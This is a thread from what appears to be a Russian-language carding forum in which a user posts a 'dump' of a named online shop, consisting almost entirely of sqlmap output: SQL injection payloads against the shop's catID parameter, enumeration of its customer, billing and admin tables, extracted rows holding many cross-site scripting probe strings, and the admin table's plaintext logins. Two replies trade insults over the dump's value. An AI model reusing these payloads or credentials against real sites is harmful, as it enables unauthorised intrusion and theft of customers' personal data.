1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

дамп онлайн магазина http://www.1001technologies.com

Тема в разделе "Базы | Каталоги", создана пользователем cyber_chinya, 28 авг 2017.

  1. TopicStarter Overlay
    cyber_chinya

    cyber_chinya

    Регистрация:
    12 ноя 2015
    Сообщения:
    51
    Симпатии:
    5
    Код:
    sqlmap identified the following injection point(s) with a total of 215 HTTP(s) requests:
    ---
    Parameter: catID (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: catID=1' AND 3370=3370 AND 'veNY'='veNY
    
        Type: error-based
        Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: catID=1' AND ROW(4927,8673)>(SELECT COUNT(*),CONCAT(0x7176787671,(SELECT (ELT(4927=4927,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROM (SELECT 3266 UNION SELECT 4935 UNION SELECT 1839 UNION SELECT 2612)a GROUP BY x) AND 'eAdr'='eAdr
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: catID=1' AND SLEEP(5) AND 'AEJW'='AEJW
    ---
    web application technology: Apache
    back-end DBMS: MySQL >= 4.1
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: catID (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: catID=1' AND 3370=3370 AND 'veNY'='veNY
    
        Type: error-based
        Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: catID=1' AND ROW(4927,8673)>(SELECT COUNT(*),CONCAT(0x7176787671,(SELECT (ELT(4927=4927,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROM (SELECT 3266 UNION SELECT 4935 UNION SELECT 1839 UNION SELECT 2612)a GROUP BY x) AND 'eAdr'='eAdr
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: catID=1' AND SLEEP(5) AND 'AEJW'='AEJW
    ---
    web application technology: Apache
    back-end DBMS: MySQL >= 4.1
    Database: ishoppingnow_ishop
    [12 tables]
    +---------------------------------------+
    | translate                             |
    | tbl_admin                             |
    | tbl_billing                           |
    | tbl_cart                              |
    | tbl_category                          |
    | tbl_country                           |
    | tbl_country_state                     |
    | tbl_exchange                          |
    | tbl_order                             |
    | tbl_order_detail                      |
    | tbl_product                           |
    | tbl_user_detail                       |
    +---------------------------------------+
    
    Database: ishoppingnow_ishop1
    [12 tables]
    +---------------------------------------+
    | translate                             |
    | tbl_admin                             |
    | tbl_billing                           |
    | tbl_cart                              |
    | tbl_category                          |
    | tbl_country                           |
    | tbl_country_state                     |
    | tbl_exchange                          |
    | tbl_order                             |
    | tbl_order_detail                      |
    | tbl_product                           |
    | tbl_user_detail                       |
    +---------------------------------------+
    
    Database: information_schema
    [17 tables]
    +---------------------------------------+
    | CHARACTER_SETS                        |
    | COLLATIONS                            |
    | COLLATION_CHARACTER_SET_APPLICABILITY |
    | COLUMNS                               |
    | COLUMN_PRIVILEGES                     |
    | KEY_COLUMN_USAGE                      |
    | PROFILING                             |
    | ROUTINES                              |
    | SCHEMATA                              |
    | SCHEMA_PRIVILEGES                     |
    | STATISTICS                            |
    | TABLES                                |
    | TABLE_CONSTRAINTS                     |
    | TABLE_PRIVILEGES                      |
    | TRIGGERS                              |
    | USER_PRIVILEGES                       |
    | VIEWS                                 |
    +---------------------------------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_order_detail
    [4 columns]
    +---------------+---------+
    | Column        | Type    |
    +---------------+---------+
    | fldid         | int(11) |
    | int_productid | int(11) |
    | order_id      | int(11) |
    | qty           | int(11) |
    +---------------+---------+
    
    Database: ishoppingnow_ishop
    Table: tbl_exchange
    [2 columns]
    +----------------+-------------+
    | Column         | Type        |
    +----------------+-------------+
    | exchange_price | varchar(20) |
    | int_id         | int(11)     |
    +----------------+-------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_order
    [3 columns]
    +------------+---------+
    | Column     | Type    |
    +------------+---------+
    | amount     | float   |
    | bit_active | char(1) |
    | order_id   | int(11) |
    +------------+---------+
    
    Database: ishoppingnow_ishop
    Table: tbl_billing
    [17 columns]
    +----------------+--------------+
    | Column         | Type         |
    +----------------+--------------+
    | bit_active     | char(1)      |
    | int_user_id    | int(11)      |
    | int_zip        | varchar(11)  |
    | order_id       | int(11)      |
    | str_address_1  | varchar(255) |
    | str_address_2  | varchar(255) |
    | str_cell_phone | varchar(20)  |
    | str_city       | varchar(150) |
    | str_country    | int(11)      |
    | str_date       | date         |
    | str_email      | varchar(50)  |
    | str_first_name | varchar(50)  |
    | str_home_phone | varchar(50)  |
    | str_last_name  | varchar(50)  |
    | str_password   | varchar(50)  |
    | str_state      | int(11)      |
    | str_work_phone | varchar(20)  |
    +----------------+--------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_cart
    [5 columns]
    +---------------+--------------+
    | Column        | Type         |
    +---------------+--------------+
    | cart_id       | varchar(200) |
    | flddate       | date         |
    | fldid         | int(11)      |
    | int_productid | int(11)      |
    | qty           | smallint(2)  |
    +---------------+--------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_category
    [6 columns]
    +------------------+---------------+
    | Column           | Type          |
    +------------------+---------------+
    | add_price        | int(11)       |
    | bit_active       | enum('0','1') |
    | int_categoryId   | int(11)       |
    | parent_id        | int(11)       |
    | str_categoryName | varchar(255)  |
    | txt_categoryDesc | text          |
    +------------------+---------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_country
    [3 columns]
    +----------------+--------------+
    | Column         | Type         |
    +----------------+--------------+
    | bit_active     | tinyint(4)   |
    | int_country_id | smallint(6)  |
    | str_country    | varchar(100) |
    +----------------+--------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_product
    [14 columns]
    +--------------------------+---------------+
    | Column                   | Type          |
    +--------------------------+---------------+
    | bit_active               | enum('0','1') |
    | bit_deal_of_week_product | char(1)       |
    | bit_featured_product     | char(1)       |
    | bit_hot_offers_product   | char(1)       |
    | int_categoryId           | varchar(11)   |
    | int_productId            | int(11)       |
    | int_subcategoryId        | int(11)       |
    | product_image            | varchar(50)   |
    | product_Price            | float         |
    | product_sale_price       | float         |
    | product_thumbnails       | varchar(50)   |
    | str_date                 | date          |
    | str_productDesc          | text          |
    | str_productName          | varchar(255)  |
    +--------------------------+---------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_admin
    [3 columns]
    +---------------+--------------+
    | Column        | Type         |
    +---------------+--------------+
    | int_adminId   | int(11)      |
    | str_adminName | varchar(100) |
    | str_password  | varchar(100) |
    +---------------+--------------+
    
    Database: ishoppingnow_ishop
    Table: translate
    [4 columns]
    +--------+--------------+
    | Column | Type         |
    +--------+--------------+
    | DE     | varchar(255) |
    | EN     | varchar(255) |
    | IC     | varchar(255) |
    | ID     | int(11)      |
    +--------+--------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_country_state
    [5 columns]
    +----------------------+---------------+
    | Column               | Type          |
    +----------------------+---------------+
    | dec_tax_percentage   | decimal(11,2) |
    | int_country_id       | int(11)       |
    | int_country_state_id | int(11)       |
    | str_country_state    | varchar(50)   |
    | str_state_abbr       | varchar(10)   |
    +----------------------+---------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_user_detail
    [16 columns]
    +----------------+---------------+
    | Column         | Type          |
    +----------------+---------------+
    | bit_active     | enum('0','1') |
    | int_user_id    | int(11)       |
    | int_zip        | varchar(11)   |
    | str_address_1  | varchar(225)  |
    | str_address_2  | varchar(225)  |
    | str_cell_phone | varchar(50)   |
    | str_city       | varchar(150)  |
    | str_country    | int(11)       |
    | str_date       | date          |
    | str_email      | varchar(100)  |
    | str_first_name | varchar(50)   |
    | str_home_phone | varchar(50)   |
    | str_last_name  | varchar(50)   |
    | str_password   | varchar(50)   |
    | str_state      | int(11)       |
    | str_work_phone | varchar(50)   |
    +----------------+---------------+
    
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: catID (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: catID=1' AND 3370=3370 AND 'veNY'='veNY
    
        Type: error-based
        Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: catID=1' AND ROW(4927,8673)>(SELECT COUNT(*),CONCAT(0x7176787671,(SELECT (ELT(4927=4927,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROM (SELECT 3266 UNION SELECT 4935 UNION SELECT 1839 UNION SELECT 2612)a GROUP BY x) AND 'eAdr'='eAdr
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: catID=1' AND SLEEP(5) AND 'AEJW'='AEJW
    ---
    web application technology: Apache
    back-end DBMS: MySQL >= 4.1
    Database: ishoppingnow_ishop
    Table: tbl_user_detail
    [24 entries]
    +-------------------------------+-------------+------------------------------------------------------------------------------------------------------+
    | str_password                  | int_user_id | str_email                                                                                            |
    +-------------------------------+-------------+------------------------------------------------------------------------------------------------------+
    | 111-222-1933email@address.tst | 53          | <embed src="http://testphp.acunetix.com/xss.swf?418989518709" type="application/x-shockwave-flash"/> |
    | 111-222-1933email@address.tst | 54          | <FRAMESET><FRAME SRC="JaVaScRiPt:alert(41894951870                                                   |
    | 111-222-1933email@address.tst | 55          | <img dynsrc="JaVaScRiPt:alert(418959518709);">                                                       |
    | 111-222-1933email@address.tst | 56          | <ScRiPt src=http://testphp.acunetix.com/xss.js?419009518709></ScRiPt>                                |
    | 111-222-1933email@address.tst | 57          | <body onload=alert(418999518709)>                                                                    |
    | 111-222-1933email@address.tst | 58          | <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" inv |
    | 111-222-1933email@address.tst | 59          | <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRi                                                   |
    | 111-222-1933email@address.tst | 60          | <img src=http://testphp.acunetix.com/dot.gif onload=alert(419819538862)>                             |
    | 111-222-1933email@address.tst | 61          | for                                                                                                  |
    | 111-222-1933email@address.tst | 62          | <ScRiPt>alert(419839538862);</ScRiPt>                                                                |
    | 111-222-1933email@address.tst | 63          | <script/xss src=http://testphp.acunetix.com/xss.js?419809538862></script>                            |
    | 111-222-1933email@address.tst | 64          | </div><ScRiPt \n\r>alert(419869538864);</ScRiPt>                                                     |
    | 111-222-1933email@address.tst | 65          | for                                                                                                  |
    | 111-222-1933email@address.tst | 66          | <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?419849538862"></ScRiPt>                      |
    | 111-222-1933email@address.tst | 67          | " onmouseover=alert(419859538862)                                                                    |
    | 111-222-1933email@address.tst | 68          | ' style='background:url(JaVaScRiPt:alert(419829538862))' invalidparam='                              |
    | 111-222-1933email@address.tst | 69          | <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert |
    | 111-222-1933email@address.tst | 70          | PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4=                                                     |
    | 111-222-1933email@address.tst | 71          | IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk=                                                         |
    | 111-222-1933email@address.tst | 72          | %uff1e%uff07%uff1exxx%uff1cscript%uff1ealert(419969541386);%uff1c/script%uff1e                       |
    | !S!WCRTESTINPUT000001!E!      | 142         | !S!WCRTESTINPUT000000!E!                                                                             |
    | !S!WCRTESTINPUT000001!E!      | 143         | !S!WCRTESTINPUT000000!E!' and '7'='7                                                                 |
    | !S!WCRTESTINPUT000001!E!      | 144         | !S!WCRTESTINPUT000000!E!' and '7'='2                                                                 |
    | !S!WCRTESTINPUT000001!E!      | 145         | 1 and 7=7                                                                                            |
    +-------------------------------+-------------+------------------------------------------------------------------------------------------------------+
    
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: catID (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: catID=1' AND 3370=3370 AND 'veNY'='veNY
    
        Type: error-based
        Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: catID=1' AND ROW(4927,8673)>(SELECT COUNT(*),CONCAT(0x7176787671,(SELECT (ELT(4927=4927,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROM (SELECT 3266 UNION SELECT 4935 UNION SELECT 1839 UNION SELECT 2612)a GROUP BY x) AND 'eAdr'='eAdr
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: catID=1' AND SLEEP(5) AND 'AEJW'='AEJW
    ---
    web application technology: Apache
    back-end DBMS: MySQL >= 4.1
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: catID (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: catID=1' AND 3370=3370 AND 'veNY'='veNY
    
        Type: error-based
        Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: catID=1' AND ROW(4927,8673)>(SELECT COUNT(*),CONCAT(0x7176787671,(SELECT (ELT(4927=4927,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROM (SELECT 3266 UNION SELECT 4935 UNION SELECT 1839 UNION SELECT 2612)a GROUP BY x) AND 'eAdr'='eAdr
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: catID=1' AND SLEEP(5) AND 'AEJW'='AEJW
    ---
    web application technology: Apache
    back-end DBMS: MySQL >= 4.1
    Database: ishoppingnow_ishop
    Table: tbl_admin
    [2 entries]
    +---------------+--------------+
    | str_adminName | str_password |
    +---------------+--------------+
    | admin         | admin        |
    | fuckup        | fuckup       |
    +---------------+--------------+
    
    продолжение

    Код:
    Database: ishoppingnow_ishop
    Table: tbl_order_detail
    [4 columns]
    +---------------+---------+
    | Column        | Type    |
    +---------------+---------+
    | fldid         | int(11) |
    | int_productid | int(11) |
    | order_id      | int(11) |
    | qty           | int(11) |
    +---------------+---------+
    
    Database: ishoppingnow_ishop
    Table: tbl_exchange
    [2 columns]
    +----------------+-------------+
    | Column         | Type        |
    +----------------+-------------+
    | exchange_price | varchar(20) |
    | int_id         | int(11)     |
    +----------------+-------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_order
    [3 columns]
    +------------+---------+
    | Column     | Type    |
    +------------+---------+
    | amount     | float   |
    | bit_active | char(1) |
    | order_id   | int(11) |
    +------------+---------+
    
    Database: ishoppingnow_ishop
    Table: tbl_billing
    [17 columns]
    +----------------+--------------+
    | Column         | Type         |
    +----------------+--------------+
    | bit_active     | char(1)      |
    | int_user_id    | int(11)      |
    | int_zip        | varchar(11)  |
    | order_id       | int(11)      |
    | str_address_1  | varchar(255) |
    | str_address_2  | varchar(255) |
    | str_cell_phone | varchar(20)  |
    | str_city       | varchar(150) |
    | str_country    | int(11)      |
    | str_date       | date         |
    | str_email      | varchar(50)  |
    | str_first_name | varchar(50)  |
    | str_home_phone | varchar(50)  |
    | str_last_name  | varchar(50)  |
    | str_password   | varchar(50)  |
    | str_state      | int(11)      |
    | str_work_phone | varchar(20)  |
    +----------------+--------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_cart
    [5 columns]
    +---------------+--------------+
    | Column        | Type         |
    +---------------+--------------+
    | cart_id       | varchar(200) |
    | flddate       | date         |
    | fldid         | int(11)      |
    | int_productid | int(11)      |
    | qty           | smallint(2)  |
    +---------------+--------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_category
    [6 columns]
    +------------------+---------------+
    | Column           | Type          |
    +------------------+---------------+
    | add_price        | int(11)       |
    | bit_active       | enum('0','1') |
    | int_categoryId   | int(11)       |
    | parent_id        | int(11)       |
    | str_categoryName | varchar(255)  |
    | txt_categoryDesc | text          |
    +------------------+---------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_country
    [3 columns]
    +----------------+--------------+
    | Column         | Type         |
    +----------------+--------------+
    | bit_active     | tinyint(4)   |
    | int_country_id | smallint(6)  |
    | str_country    | varchar(100) |
    +----------------+--------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_product
    [14 columns]
    +--------------------------+---------------+
    | Column                   | Type          |
    +--------------------------+---------------+
    | bit_active               | enum('0','1') |
    | bit_deal_of_week_product | char(1)       |
    | bit_featured_product     | char(1)       |
    | bit_hot_offers_product   | char(1)       |
    | int_categoryId           | varchar(11)   |
    | int_productId            | int(11)       |
    | int_subcategoryId        | int(11)       |
    | product_image            | varchar(50)   |
    | product_Price            | float         |
    | product_sale_price       | float         |
    | product_thumbnails       | varchar(50)   |
    | str_date                 | date          |
    | str_productDesc          | text          |
    | str_productName          | varchar(255)  |
    +--------------------------+---------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_admin
    [3 columns]
    +---------------+--------------+
    | Column        | Type         |
    +---------------+--------------+
    | int_adminId   | int(11)      |
    | str_adminName | varchar(100) |
    | str_password  | varchar(100) |
    +---------------+--------------+
    
    Database: ishoppingnow_ishop
    Table: translate
    [4 columns]
    +--------+--------------+
    | Column | Type         |
    +--------+--------------+
    | DE     | varchar(255) |
    | EN     | varchar(255) |
    | IC     | varchar(255) |
    | ID     | int(11)      |
    +--------+--------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_country_state
    [5 columns]
    +----------------------+---------------+
    | Column               | Type          |
    +----------------------+---------------+
    | dec_tax_percentage   | decimal(11,2) |
    | int_country_id       | int(11)       |
    | int_country_state_id | int(11)       |
    | str_country_state    | varchar(50)   |
    | str_state_abbr       | varchar(10)   |
    +----------------------+---------------+
    
    Database: ishoppingnow_ishop
    Table: tbl_user_detail
    [16 columns]
    +----------------+---------------+
    | Column         | Type          |
    +----------------+---------------+
    | bit_active     | enum('0','1') |
    | int_user_id    | int(11)       |
    | int_zip        | varchar(11)   |
    | str_address_1  | varchar(225)  |
    | str_address_2  | varchar(225)  |
    | str_cell_phone | varchar(50)   |
    | str_city       | varchar(150)  |
    | str_country    | int(11)       |
    | str_date       | date          |
    | str_email      | varchar(100)  |
    | str_first_name | varchar(50)   |
    | str_home_phone | varchar(50)   |
    | str_last_name  | varchar(50)   |
    | str_password   | varchar(50)   |
    | str_state      | int(11)       |
    | str_work_phone | varchar(50)   |
    +----------------+---------------+
    
     
    Метки:
  2. bios

    bios

    Регистрация:
    22 июн 2012
    Сообщения:
    547
    Симпатии:
    629
    Такой хлам оставь себе, он тут нахуй никому не сдался
     
  3. TopicStarter Overlay
    cyber_chinya

    cyber_chinya

    Регистрация:
    12 ноя 2015
    Сообщения:
    51
    Симпатии:
    5
    у самого ума хватит что то путнее выложить?если я выкладываю что то путнее то я ставлю жёсткий антинуб, свои эмоции излогай про себя.
    В следущий раз выкладываю реальное и ценное под жёсткий антинуб и большой хайд.
     
  4. bios

    bios

    Регистрация:
    22 июн 2012
    Сообщения:
    547
    Симпатии:
    629
    В отличие от тебя, я не выкладываю дампы всяких говно-маркетов, так что про ум тут не надо выебываться. Иди на факавы всякие и там свою преисподнюю выкладывай )
     

Поделиться этой страницей

Загрузка...